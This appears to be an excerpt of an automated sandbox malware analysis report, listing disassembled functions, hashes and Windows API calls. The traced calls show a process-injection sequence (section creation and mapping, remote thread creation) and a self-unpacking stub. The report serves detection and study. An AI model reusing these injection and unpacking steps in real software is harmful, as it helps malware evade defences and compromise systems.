                                          • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                          • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                          • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                          • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                          Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                          • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                          • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                          • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                          Function 0069F657 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 444 69f657-69f691 call 69f96a 447 69f6df 444->447 448 69f693-69f6c6 VirtualAlloc call 69f6e4 444->448 447->447 450 69f6cb-69f6dd 448->450 450->447
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0069F6A8
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_68d000_teihrdr.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction ID: 44117fd1a2281ae65e2229a245ddf47d73d2c7cc8919bd4ec7e385fb42167342
                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                          • Instruction Fuzzy Hash: 72113C79A00208EFDB01DF98C985E98BBF5AF08350F1580A5F9489B362D371EA50DF84
                                          Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                          APIs
                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2368799109.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_teihrdr.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectSleepView
                                          • String ID:
                                          • API String ID: 1885482327-0
                                          • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                          • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                          • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                          • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                          Execution Graph

                                          Execution Coverage:6.1%
                                          Dynamic/Decrypted Code Coverage:42.5%
                                          Signature Coverage:0%
                                          Total number of Nodes:113
                                          Total number of Limit Nodes:4
                                          execution_graph 4223 403043 4224 40319a 4223->4224 4225 40306d 4223->4225 4225->4224 4226 403128 RtlCreateUserThread NtTerminateProcess 4225->4226 4226->4224 4248 1fa003c 4249 1fa0049 4248->4249 4261 1fa0e0f SetErrorMode SetErrorMode 4249->4261 4254 1fa0265 4255 1fa02ce VirtualProtect 4254->4255 4257 1fa030b 4255->4257 4256 1fa0439 VirtualFree 4260 1fa04be LoadLibraryA 4256->4260 4257->4256 4259 1fa08c7 4260->4259 4262 1fa0223 4261->4262 4263 1fa0d90 4262->4263 4264 1fa0dad 4263->4264 4265 1fa0dbb GetPEB 4264->4265 4266 1fa0238 VirtualAlloc 4264->4266 4265->4266 4266->4254 4282 4014cf 4283 4014d3 4282->4283 4284 401571 4283->4284 4285 401660 NtDuplicateObject 4283->4285 4285->4284 4286 40167d NtCreateSection 4285->4286 4287 4016a3 NtMapViewOfSection 4286->4287 4288 4016fd NtCreateSection 4286->4288 4287->4288 4289 4016c6 NtMapViewOfSection 4287->4289 4288->4284 4290 401729 4288->4290 4289->4288 4291 4016e4 4289->4291 4290->4284 4292 401733 NtMapViewOfSection 4290->4292 4291->4288 4292->4284 4293 40175a NtMapViewOfSection 4292->4293 4293->4284 4383 4015d5 4384 4015e4 4383->4384 4385 40177c 4384->4385 4386 401660 NtDuplicateObject 4384->4386 4386->4385 4387 40167d NtCreateSection 4386->4387 4388 4016a3 NtMapViewOfSection 4387->4388 4389 4016fd NtCreateSection 4387->4389 4388->4389 4390 4016c6 NtMapViewOfSection 4388->4390 4389->4385 4391 401729 4389->4391 4390->4389 4392 4016e4 4390->4392 4391->4385 4393 401733 NtMapViewOfSection 4391->4393 4392->4389 4393->4385 4394 40175a NtMapViewOfSection 4393->4394 4394->4385 4227 402f16 4228 402f1a 4227->4228 4230 402fa2 4228->4230 4231 401991 4228->4231 4232 4019a0 4231->4232 4233 4019d8 Sleep 4232->4233 4235 4019f3 4233->4235 4236 4014c4 4233->4236 4235->4230 4237 4014d3 4236->4237 4238 401660 NtDuplicateObject 4237->4238 4247 401571 4237->4247 4239 40167d NtCreateSection 4238->4239 4238->4247 4240 4016a3 NtMapViewOfSection 4239->4240 4241 4016fd NtCreateSection 4239->4241 4240->4241 4242 4016c6 NtMapViewOfSection 4240->4242 4243 401729 4241->4243 4241->4247 4242->4241 4244 4016e4 4242->4244 4245 401733 NtMapViewOfSection 4243->4245 4243->4247 4244->4241 4246 40175a NtMapViewOfSection 4245->4246 4245->4247 4246->4247 4247->4235 4354 402e9a 4355 402e5f 4354->4355 4356 402eaf 4354->4356 4357 401991 8 API calls 4356->4357 4358 402fa2 4356->4358 4357->4358 4267 59ed85 4268 59ed94 4267->4268 4271 59f525 4268->4271 4272 59f540 4271->4272 4273 59f549 CreateToolhelp32Snapshot 4272->4273 4274 59f565 Module32First 4272->4274 4273->4272 4273->4274 4275 59ed9d 4274->4275 4276 59f574 4274->4276 4278 59f1e4 4276->4278 4279 59f20f 4278->4279 4280 59f220 VirtualAlloc 4279->4280 4281 59f258 4279->4281 4280->4281 4306 402ee7 4307 402ef9 4306->4307 4308 401991 8 API calls 4307->4308 4309 402fa2 4307->4309 4308->4309 4431 4019a9 4432 4019a0 4431->4432 4433 4019d8 Sleep 4432->4433 4434 4014c4 7 API calls 4433->4434 4435 4019f3 4433->4435 4434->4435 4359 401975 4360 401979 4359->4360 4361 4014c4 7 API calls 4360->4361 4362 4019f3 4361->4362 4446 1fa0001 4447 1fa0005 4446->4447 4452 1fa092b GetPEB 4447->4452 4449 1fa0030 4454 1fa003c 4449->4454 4453 1fa0972 4452->4453 4453->4449 4455 1fa0049 4454->4455 4456 1fa0e0f 2 API calls 4455->4456 4457 1fa0223 4456->4457 4458 1fa0d90 GetPEB 4457->4458 4459 1fa0238 VirtualAlloc 4458->4459 4460 1fa0265 4459->4460 4461 1fa02ce VirtualProtect 4460->4461 4463 1fa030b 4461->4463 4462 1fa0439 VirtualFree 4466 1fa04be LoadLibraryA 4462->4466 4463->4462 4465 1fa08c7 4466->4465 4467 1fa0005 4468 1fa092b GetPEB 4467->4468 4469 1fa0030 4468->4469 4470 1fa003c 7 API calls 4469->4470 4471 1fa0038 4470->4471

                                          Executed Functions

                                          Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 85 4014c4-4014f6 91 4014f9-40150d call 401240 85->91 96 401512-401513 91->96 97 401544-401545 96->97 98 401515-401528 96->98 99 401547 97->99 100 4015bd-4015d4 97->100 98->91 101 40152a-401535 98->101 103 401596-4015a6 99->103 104 401549-40154b 99->104 101->96 102 401537-401543 101->102 102->97 106 4015a8 103->106 104->106 107 40154d-40156d 104->107 109 4015e7-40160a call 401240 107->109 110 40156f 107->110 119 40160c 109->119 120 40160f-401614 109->120 112 401571 110->112 113 4015e2-4015e3 110->113 113->109 119->120 122 40161a-40162b 120->122 123 40193e-401946 120->123 126 401631-40165a 122->126 127 40193c 122->127 123->120 128 40194b-40198e call 401240 123->128 126->127 136 401660-401677 NtDuplicateObject 126->136 127->128 136->127 137 40167d-4016a1 NtCreateSection 136->137 139 4016a3-4016c4 NtMapViewOfSection 137->139 140 4016fd-401723 NtCreateSection 137->140 139->140 142 4016c6-4016e2 NtMapViewOfSection 139->142 140->127 144 401729-40172d 140->144 142->140 145 4016e4-4016fa 142->145 144->127 147 401733-401754 NtMapViewOfSection 144->147 145->140 147->127 149 40175a-401776 NtMapViewOfSection 147->149 149->127 152 40177c 149->152 152->127 153 40177c call 401781 152->153 153->127
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                          • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                          • Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
                                          • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66
                                          Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 154 4015d5-4015e4 156 4015f4 154->156 157 4015eb-4015f0 154->157 156->157 158 4015f7-40160a call 401240 156->158 157->158 161 40160c 158->161 162 40160f-401614 158->162 161->162 164 40161a-40162b 162->164 165 40193e-401946 162->165 168 401631-40165a 164->168 169 40193c 164->169 165->162 170 40194b-40198e call 401240 165->170 168->169 178 401660-401677 NtDuplicateObject 168->178 169->170 178->169 179 40167d-4016a1 NtCreateSection 178->179 181 4016a3-4016c4 NtMapViewOfSection 179->181 182 4016fd-401723 NtCreateSection 179->182 181->182 184 4016c6-4016e2 NtMapViewOfSection 181->184 182->169 186 401729-40172d 182->186 184->182 187 4016e4-4016fa 184->187 186->169 189 401733-401754 NtMapViewOfSection 186->189 187->182 189->169 191 40175a-401776 NtMapViewOfSection 189->191 191->169 194 40177c 191->194 194->169 195 40177c call 401781 194->195 195->169
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                          • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                          • Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
                                          • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64
                                          Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 196 4015df-4015e4 198 4015f4 196->198 199 4015eb-4015f0 196->199 198->199 200 4015f7-40160a call 401240 198->200 199->200 203 40160c 200->203 204 40160f-401614 200->204 203->204 206 40161a-40162b 204->206 207 40193e-401946 204->207 210 401631-40165a 206->210 211 40193c 206->211 207->204 212 40194b-40198e call 401240 207->212 210->211 220 401660-401677 NtDuplicateObject 210->220 211->212 220->211 221 40167d-4016a1 NtCreateSection 220->221 223 4016a3-4016c4 NtMapViewOfSection 221->223 224 4016fd-401723 NtCreateSection 221->224 223->224 226 4016c6-4016e2 NtMapViewOfSection 223->226 224->211 228 401729-40172d 224->228 226->224 229 4016e4-4016fa 226->229 228->211 231 401733-401754 NtMapViewOfSection 228->231 229->224 231->211 233 40175a-401776 NtMapViewOfSection 231->233 233->211 236 40177c 233->236 236->211 237 40177c call 401781 236->237 237->211
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                          • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                          • Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
                                          • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64
                                          Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 238 4015f2-4015f4 240 4015f7-40160a call 401240 238->240 241 4015eb-4015f0 238->241 244 40160c 240->244 245 40160f-401614 240->245 241->240 244->245 247 40161a-40162b 245->247 248 40193e-401946 245->248 251 401631-40165a 247->251 252 40193c 247->252 248->245 253 40194b-40198e call 401240 248->253 251->252 261 401660-401677 NtDuplicateObject 251->261 252->253 261->252 262 40167d-4016a1 NtCreateSection 261->262 264 4016a3-4016c4 NtMapViewOfSection 262->264 265 4016fd-401723 NtCreateSection 262->265 264->265 267 4016c6-4016e2 NtMapViewOfSection 264->267 265->252 269 401729-40172d 265->269 267->265 270 4016e4-4016fa 267->270 269->252 272 401733-401754 NtMapViewOfSection 269->272 270->265 272->252 274 40175a-401776 NtMapViewOfSection 272->274 274->252 277 40177c 274->277 277->252 278 40177c call 401781 277->278 278->252
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                          • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                          • Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
                                          • Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64
                                          Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163nativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 279 4015e6-40160a call 401240 284 40160c 279->284 285 40160f-401614 279->285 284->285 287 40161a-40162b 285->287 288 40193e-401946 285->288 291 401631-40165a 287->291 292 40193c 287->292 288->285 293 40194b-40198e call 401240 288->293 291->292 301 401660-401677 NtDuplicateObject 291->301 292->293 301->292 302 40167d-4016a1 NtCreateSection 301->302 304 4016a3-4016c4 NtMapViewOfSection 302->304 305 4016fd-401723 NtCreateSection 302->305 304->305 307 4016c6-4016e2 NtMapViewOfSection 304->307 305->292 309 401729-40172d 305->309 307->305 310 4016e4-4016fa 307->310 309->292 312 401733-401754 NtMapViewOfSection 309->312 310->305 312->292 314 40175a-401776 NtMapViewOfSection 312->314 314->292 317 40177c 314->317 317->292 318 40177c call 401781 317->318 318->292
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                          • Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
                                          • Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
                                          • Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64
                                          Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 319 403043-403067 320 40319a-40319f 319->320 321 40306d-403085 319->321 321->320 322 40308b-40309c 321->322 323 40309e-4030a7 322->323 324 4030ac-4030ba 323->324 324->324 325 4030bc-4030c3 324->325 326 4030e5-4030ec 325->326 327 4030c5-4030e4 325->327 328 40310e-403111 326->328 329 4030ee-40310d 326->329 327->326 330 403113-403116 328->330 331 40311a 328->331 329->328 330->331 332 403118 330->332 331->323 333 40311c-403121 331->333 332->333 333->320 334 403123-403126 333->334 334->320 335 403128-403197 RtlCreateUserThread NtTerminateProcess 334->335 335->320
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644511802.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_400000_B9A0.jbxd
                                          Similarity
                                          • API ID: CreateProcessTerminateThreadUser
                                          • String ID:
                                          • API String ID: 1921587553-0
                                          • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                          • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                          • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9
                                          Function 01FA003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 1fa003c-1fa0047 1 1fa0049 0->1 2 1fa004c-1fa0263 call 1fa0a3f call 1fa0e0f call 1fa0d90 VirtualAlloc 0->2 1->2 17 1fa028b-1fa0292 2->17 18 1fa0265-1fa0289 call 1fa0a69 2->18 20 1fa02a1-1fa02b0 17->20 22 1fa02ce-1fa03c2 VirtualProtect call 1fa0cce call 1fa0ce7 18->22 20->22 23 1fa02b2-1fa02cc 20->23 29 1fa03d1-1fa03e0 22->29 23->20 30 1fa0439-1fa04b8 VirtualFree 29->30 31 1fa03e2-1fa0437 call 1fa0ce7 29->31 33 1fa04be-1fa04cd 30->33 34 1fa05f4-1fa05fe 30->34 31->29 36 1fa04d3-1fa04dd 33->36 37 1fa077f-1fa0789 34->37 38 1fa0604-1fa060d 34->38 36->34 40 1fa04e3-1fa0505 36->40 41 1fa078b-1fa07a3 37->41 42 1fa07a6-1fa07b0 37->42 38->37 43 1fa0613-1fa0637 38->43 52 1fa0517-1fa0520 40->52 53 1fa0507-1fa0515 40->53 41->42 44 1fa086e-1fa08be LoadLibraryA 42->44 45 1fa07b6-1fa07cb 42->45 46 1fa063e-1fa0648 43->46 51 1fa08c7-1fa08f9 44->51 49 1fa07d2-1fa07d5 45->49 46->37 47 1fa064e-1fa065a 46->47 47->37 50 1fa0660-1fa066a 47->50 54 1fa07d7-1fa07e0 49->54 55 1fa0824-1fa0833 49->55 58 1fa067a-1fa0689 50->58 60 1fa08fb-1fa0901 51->60 61 1fa0902-1fa091d 51->61 62 1fa0526-1fa0547 52->62 53->62 56 1fa07e2 54->56 57 1fa07e4-1fa0822 54->57 59 1fa0839-1fa083c 55->59 56->55 57->49 64 1fa068f-1fa06b2 58->64 65 1fa0750-1fa077a 58->65 59->44 66 1fa083e-1fa0847 59->66 60->61 63 1fa054d-1fa0550 62->63 67 1fa05e0-1fa05ef 63->67 68 1fa0556-1fa056b 63->68 69 1fa06ef-1fa06fc 64->69 70 1fa06b4-1fa06ed 64->70 65->46 71 1fa084b-1fa086c 66->71 72 1fa0849 66->72 67->36 74 1fa056f-1fa057a 68->74 75 1fa056d 68->75 76 1fa074b 69->76 77 1fa06fe-1fa0748 69->77 70->69 71->59 72->44 78 1fa059b-1fa05bb 74->78 79 1fa057c-1fa0599 74->79 75->67 76->58 77->76 84 1fa05bd-1fa05db 78->84 79->84 84->63
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01FA024D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2645014782.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FA0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_1fa0000_B9A0.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID: cess$kernel32.dll
                                          • API String ID: 4275171209-1230238691
                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction ID: 2986c96ea02455e376ab3f8f91fd8668def29363e1ec19eb6efd90f862458d90
                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                          • Instruction Fuzzy Hash: 835289B5A00229DFDB64CF58D984BACBBB1BF09304F5480D9E94DAB351DB35AA84CF14
                                          Function 0059F525 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 336 59f525-59f53e 337 59f540-59f542 336->337 338 59f549-59f555 CreateToolhelp32Snapshot 337->338 339 59f544 337->339 340 59f565-59f572 Module32First 338->340 341 59f557-59f55d 338->341 339->338 342 59f57b-59f583 340->342 343 59f574-59f575 call 59f1e4 340->343 341->340 347 59f55f-59f563 341->347 348 59f57a 343->348 347->337 347->340 348->342
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0059F54D
                                          • Module32First.KERNEL32(00000000,00000224), ref: 0059F56D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2644866394.000000000058D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0058D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_7_2_58d000_B9A0.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFirstModule32SnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3833638111-0
                                          • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction ID: 681b68f97bd090ae54eb6c01a30e7cc873366baaf79681e30ede6b181e722a0f
                                          • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                          • Instruction Fuzzy Hash: 28F0CD36600311ABDB202EB9A88DA6A7AECBF48320F100538E652D10C0DB70EC058B60
                                          Function 01FA0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 349 1fa0e0f-1fa0e24 SetErrorMode * 2 350 1fa0e2b-1fa0e2c 349->350 351 1fa0e26 349->351 351->350
                                          APIs
                                          • SetErrorMode.KERNELBASE(00000400,?,?,01FA0223,?,?), ref: 01FA0E19
